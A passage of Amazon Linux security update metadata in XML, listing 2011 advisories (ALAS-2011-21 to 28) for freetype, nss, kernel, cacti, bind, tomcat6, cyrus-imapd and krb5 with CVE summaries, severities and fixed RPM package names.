FreeType in CoreGraphics in Apple iOS before 5.0.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted font in a document.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3439" title="" id="CVE-2011-3439" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1455.html" title="" id="RHSA-2011:1455" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freetype-demos" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-6.11.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-6.11.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-6.11.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-6.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-21</id><title>Amazon Linux - ALAS-2011-21: medium priority package update for nss</title><issued 
date="2011-11-19 01:21:00" /><updated date="2014-09-14 14:43:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2011:1444.html" title="" id="RHSA-2011:1444" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nss-debuginfo" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.12.10" release="2.23.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/nss-debuginfo-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.12.10-2.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-22</id><title>Amazon Linux - ALAS-2011-22: medium priority package update for kernel</title><issued date="2011-11-19 01:22:00" /><updated date="2014-09-14 14:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4081:
* Flaws in ghash_update() and ghash_final() could allow a local, unprivileged user to cause a denial of service.
CVE-2011-4077:
* A buffer overflow flaw was found in the way the Linux kernel's XFS file system implementation handled links with overly long path names. A local, unprivileged user could use this flaw to cause a denial of service or escalate their privileges by mounting a specially-crafted disk.
CVE-2011-1083:
The epoll implementation in the Linux kernel 2.6.37.2 and earlier does not properly traverse a tree of epoll file descriptors, which allows local users to cause a denial of service (CPU consumption) via a crafted application that makes epoll_create and epoll_ctl system calls.
* A flaw was found in the way the Linux kernel's Event Poll (epoll) subsystem handled large, nested epoll structures. A local, unprivileged user could use this flaw to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1083" title="" id="CVE-2011-1083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4077" title="" id="CVE-2011-4077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4081" title="" id="CVE-2011-4081" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-103.47.amzn1.noarch.rpm</filename></package><package name="perf" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="103.47.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-23</id><title>Amazon Linux - ALAS-2011-23: important priority package update for cacti</title><issued date="2011-11-30 21:57:00" /><updated date="2014-09-14 15:03:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cacti" version="0.8.7h" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.7h-1.2.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-24</id><title>Amazon Linux - ALAS-2011-24: important priority package update for bind</title><issued date="2011-11-30 21:59:00" /><updated date="2014-09-14 15:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4313:
query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
A flaw was discovered in the way BIND handled certain DNS queries, which caused it to cache an invalid record. A remote attacker could use this flaw to send repeated queries for this invalid record, causing the resolvers to exit unexpectedly due to a failed assertion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4313" title="" id="CVE-2011-4313" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1458.html" title="" id="RHSA-2011:1458" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" 
version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.7.3-2.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-25</id><title>Amazon Linux - ALAS-2011-25: important priority package update for tomcat6</title><issued date="2011-12-02 22:21:00" /><updated date="2014-09-14 15:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3190:
Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
A flaw was found in the way the Coyote (org.apache.coyote.ajp.AjpProcessor) and APR (org.apache.coyote.ajp.AjpAprProcessor) Tomcat AJP (Apache JServ Protocol) connectors processed certain POST requests. An attacker could send a specially-crafted request that would cause the connector to treat the message body as a new request. This allows arbitrary AJP messages to be injected, possibly allowing an attacker to bypass a web application's authentication checks and gain access to information they would otherwise be unable to access. The JK (org.apache.jk.server.JkCoyoteHandler) connector is used by default when the APR libraries are not present. The JK connector is not affected by this flaw.
CVE-2011-2204:
Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
A flaw was found in the Tomcat MemoryUserDatabase. If a runtime exception occurred when creating a new user with a JMX client, that user's password was logged to Tomcat log files. Note: By default, only administrators have access to such log files.
CVE-2011-1184:
The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
Multiple flaws were found in the way Tomcat handled HTTP DIGEST authentication. These flaws weakened the Tomcat HTTP DIGEST authentication implementation, subjecting it to some of the weaknesses of HTTP BASIC authentication, for example, allowing remote attackers to perform session replay attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1184" title="" id="CVE-2011-1184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2204" title="" id="CVE-2011-2204" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3190" title="" id="CVE-2011-3190" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="tomcat6-el-2.1-api" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.33" release="1.26.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.33-1.26.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-26</id><title>Amazon Linux - ALAS-2011-26: medium priority package update for kernel</title><issued date="2011-12-02 22:23:00" /><updated date="2014-09-14 15:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4326:
* A flaw was found in the way the Linux kernel handled fragmented IPv6 UDP datagrams over the bridge with UDP Fragmentation Offload (UFO) functionality on. A remote attacker could use this flaw to cause a denial of service.
CVE-2011-4132:
* A flaw was found in the Linux kernel's Journaling Block Device (JBD). A local, unprivileged user could use this flaw to crash the system by mounting a specially-crafted ext3 or ext4 disk.
* A flaw was found in the Linux kernel's Journaling Block Device (JBD). A local attacker could use this flaw to crash the system by mounting a specially-crafted ext3 or ext4 disk.
CVE-2011-4110:
* A NULL pointer dereference flaw was found in the way the Linux kernel's key management facility handled user-defined key types. A local, unprivileged user could use the keyctl utility to cause a denial of service.
CVE-2011-3593:
* A flaw was found in the way the Linux kernel handled VLAN 0 frames with the priority tag set. When using certain network drivers, an attacker on the local network could use this flaw to cause a denial of service.
CVE-2011-3363:
* A flaw was found in the way CIFS shares with DFS referrals at their root were handled. An attacker on the local network who is able to deploy a malicious CIFS server could create a CIFS network share that, when mounted, would cause the client system to crash.
* A flaw was found in the way CIFS (Common Internet File System) shares with DFS referrals at their root were handled. An attacker on the local network who is able to deploy a malicious CIFS server could create a CIFS network share that, when mounted, would cause the client system to crash.
CVE-2011-3359:
* A flaw was found in the b43 driver in the Linux kernel. If a system had an active wireless interface that uses the b43 driver, an attacker able to send a specially-crafted frame to that interface could cause a denial of service.
CVE-2011-3353:
* A buffer overflow flaw was found in the Linux kernel's FUSE (Filesystem in Userspace) implementation. A local user in the fuse group who has access to mount a FUSE file system could use this flaw to cause a denial of service.
CVE-2011-3191:
* A signedness issue was found in the Linux kernel's CIFS (Common Internet File System) implementation. A malicious CIFS server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
* A malicious CIFS (Common Internet File System) server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
CVE-2011-3188:
* The way IPv4 and IPv6 protocol sequence numbers and fragment IDs were generated could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence numbers and fragment IDs are now more random.
* IPv4 and IPv6 protocol sequence number and fragment ID generation could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence number and fragment IDs are now more random.
CVE-2011-2905:
* It was found that the perf tool, a part of the Linux kernel's Performance Events implementation, could load its configuration file from the current working directory. If a local user with access to the perf tool were tricked into running perf in a directory that contains a specially-crafted configuration file, it could cause perf to overwrite arbitrary files and directories accessible to that user.
CVE-2011-2699:
* IPv6 fragment identification value generation could allow a remote attacker to disrupt a target system's networking, preventing legitimate users from accessing its services.
CVE-2011-2494:
* The I/O statistics from the taskstats subsystem could be read without any restrictions. A local, unprivileged user could use this flaw to gather confidential information, such as the length of a password used in a process.
CVE-2011-1577:
Heap-based buffer overflow in the is_gpt_valid function in fs/partitions/efi.c in the Linux kernel 2.6.38 and earlier allows physically proximate attackers to cause a denial of service (OOPS) or possibly have unspecified other impact via a crafted size of the EFI GUID partition-table header on removable media.
* A heap overflow flaw was found in the Linux kernel's EFI GUID Partition Table (GPT) implementation. A local attacker could use this flaw to cause a denial of service by mounting a disk that contains specially-crafted partition tables.
* A heap overflow flaw in the Linux kernel's EFI GUID Partition Table (GPT) implementation could allow a local attacker to cause a denial of service by mounting a disk that contains specially-crafted partition tables.
CVE-2011-1162:
* A flaw in the way memory containing security-related data was handled in tpm_read() could allow a local, unprivileged user to read the results of a previously run TPM command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1162" title="" id="CVE-2011-1162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577" title="" id="CVE-2011-1577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2494" title="" id="CVE-2011-2494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2699" title="" id="CVE-2011-2699" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2905" title="" id="CVE-2011-2905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3188" title="" id="CVE-2011-3188" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3191" title="" id="CVE-2011-3191" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3353" title="" id="CVE-2011-3353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3359" title="" id="CVE-2011-3359" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3363" title="" id="CVE-2011-3363" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3593" title="" id="CVE-2011-3593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4110" title="" id="CVE-2011-4110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4132" title="" id="CVE-2011-4132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4326" title="" id="CVE-2011-4326" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1465.html" title="" id="RHSA-2011:1465" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="106.49.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-106.49.amzn1.noarch.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" 
release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-27</id><title>Amazon Linux - ALAS-2011-27: medium priority package update for cyrus-imapd</title><issued date="2011-12-09 11:17:00" /><updated date="2014-09-14 15:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3481:
The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
A NULL pointer dereference flaw was found in the cyrus-imapd IMAP server, imapd. A remote attacker could send a specially-crafted mail message to a victim that would possibly prevent them from accessing their mail normally, if they were using an IMAP client that relies on the server threading IMAP feature.
CVE-2011-3372:
imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
An authentication bypass flaw was found in the cyrus-imapd NNTP server, nntpd. A remote user able to use the nntpd service could use this flaw to read or post newsgroup messages on an NNTP server configured to require user authentication, without providing valid authentication credentials.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3372" title="" id="CVE-2011-3372" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3481" title="" id="CVE-2011-3481" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1508.html" title="" id="RHSA-2011:1508" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cyrus-imapd" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-devel-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-utils-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-2.3.16-6.5.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-utils-2.3.16-6.5.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-devel-2.3.16-6.5.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2011-28</id><title>Amazon Linux - ALAS-2011-28: medium priority package update for krb5</title><issued date="2011-12-09 16:12:00" /><updated date="2014-09-14 15:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1530:
The process_tgs_req function in do_tgs_req.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.9 through 1.9.2 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted TGS request that triggers an error other than the KRB5_KDB_NOENTRY error.
A NULL pointer dereference flaw was found in the way the MIT Kerberos KDC processed certain TGS (Ticket-granting Server) requests. A remote, authenticated attacker could use this flaw to crash the KDC via a specially-crafted TGS request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1530" title="" id="CVE-2011-1530" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1790.html" title="" id="RHSA-2011:1790" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="krb5-server" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="22.20.amzn1" epoch="0" 